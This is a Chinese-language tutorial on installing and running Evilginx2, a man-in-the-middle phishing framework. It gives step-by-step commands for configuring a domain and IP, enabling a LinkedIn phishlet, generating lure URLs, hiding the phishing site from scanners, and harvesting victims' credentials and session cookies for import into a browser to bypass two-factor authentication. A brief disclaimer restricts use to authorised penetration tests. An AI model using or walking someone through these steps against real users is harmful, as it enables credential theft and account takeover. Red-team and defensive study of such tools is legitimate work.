一款高級網絡釣魚攻擊框架

Evilginx2介紹

evilginx2是一個中間人攻擊框架，用于網絡釣魚登錄憑據以及會話cookie，從而允許繞過雙因素身份驗證保護。

該工具是2017年發布的Evilginx的升級產品，它使用自定義版本的nginx HTTP服務器提供中間人功能，作為瀏覽器和網絡釣魚網站之間的代理。當前版本完全用GO作為獨立應用程序編寫，它實現了自己的HTTP和DNS服務器，使其易于設置和使用。

Evilginx2用途聲明

我非常清楚Evilginx2可以用于惡意目的。這項工作僅僅證明了攻擊者可以做些什么。防御者有責任考慮此類攻擊并找到保護其用戶免受此類網絡釣魚攻擊的方法。Evilginx只能在合法滲透測試任務中使用，并且必須得到被破壞方的書面許可。

Evilginx2安裝與使用

可以使用預編譯的二進制包，也可以從源代碼編譯evilginx2。需要一個外部服務器，在其中托管evilginx2安裝。

從源代碼安裝

要從源代碼編譯，請確保已安裝版本至少為1.10.0的GO（從此處獲取）并且正確設置環境變量 $GOPATH (def. $HOME/go)

安裝完畢后，將它添加到你的~/.profile，假設你安裝GO在/usr/local/go：

export GOPATH=$HOME/goexport PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

然后加載它source ~/.profiles。

現在你應該準備安裝evilginx2了：

sudo apt-get install git makego get -u github.com/kgretzky/evilginx2cd $GOPATH/src/github.com/kgretzky/evilginx2make

您現在可以從本地目錄運行evilginx2，如：

sudo ./bin/evilginx -p ./phishlets/

或全局安裝：

sudo make installsudo evilginx

上面的說明也可用于將evilginx2更新到最新版本。

使用Docker安裝

您可以從Docker中啟動evilginx2。首先構建容器：

docker build . -t evilginx2

然后你可以運行容器：

docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2

Phishlets裝在容器內/app/phishlets，可以作為配置安裝。

從預編譯的二進制包安裝

從這里抓住你想要的包

如果要進行系統范圍的安裝，請使用具有root權限的安裝腳本：

chmod 700 ./install.shsudo ./install.shsudo evilginx

或者只是從當前目錄啟動evilginx2（您還需要root權限）：

chmod 700 ./evilginxsudo ./evilginx

用法

重要！確保端口上沒有服務偵聽TCP 443，TCP 80并且UDP 53。您可能需要關閉apache或nginx以及用于解析可能正在運行的DNS的任何服務。如果無法在任何這些端口上打開偵聽，evilginx2將在啟動時告訴您。

默認情況下，evilginx2將在./phishlets/目錄中以及稍后的目錄中查找網絡釣魚/usr/share/evilginx/phishlets/。如果要指定從中加載網絡釣魚的自定義路徑，請-p 在啟動工具時使用該參數。

Usage of ./evilginx:  -debug        Enable debug output  -developer        Enable developer mode (generates self-signed certificates for all hostnames)  -p string        Phishlets directory path

您應該看到evilginx2徽標，并提示輸入命令。鍵入help或help 是否要查看可用命令或有關它們的更多詳細信息。

入門

要啟動并運行，您需要先進行一些設置。

此時我假設您已經注冊了一個域名（讓我們稱之為yourdomain.com），您在域名提供商的管理面板中設置名稱服務器（兩者ns1和ns2）以指向服務器的IP（例如10.0.0.1）：

ns1.yourdomain.com = 10.0.0.1ns2.yourdomain.com = 10.0.0.1

使用以下命令設置服務器的域和IP：

config domain yourdomain.comconfig ip 10.0.0.1

現在您可以設置要使用的網絡釣魚。為了這個簡短的指南，我們將使用LinkedIn網絡釣魚。設置網絡釣魚的主機名（顯然必須包含您的域名）：

phishlets hostname linkedin my.phishing.hostname.yourdomain.com

現在你可以enable使用phishlet，它會啟動LetsEncrypt SSL / TLS證書的自動檢索，如果你在本地找不到你選擇的主機名：

phishlets enable linkedin

您的網上誘騙網站現已上線。想想URL，您希望受害者在成功登錄時被重定向到并獲得這樣的網絡釣魚URL（受害者將被重定向到https://www.google.com）：

phishlets get-url linkedin https://www.google.com

運行phishlets只響應標記化鏈接，所以誰掃描您的主域的任何掃描儀將被重定向到URL指定為redirect_url下config。如果要隱藏您的網絡釣魚并使其甚至不響應有效的標記化網絡釣魚URL，請使用phishlet hide/unhide 命令。

您可以使用以下方式監控捕獲的憑據和會話cookie

sessions

要獲取有關捕獲的會話的詳細信息，請使用會話cookie本身（將在底部以JSON格式打印），選擇其會話ID：

sessions <id>

可以使用EditThisCookie擴展將已捕獲的會話Cookie復制并導入Chrome瀏覽器。

重要！如果您希望evilginx2在從服務器注銷后繼續運行，則應在screen會話中運行它。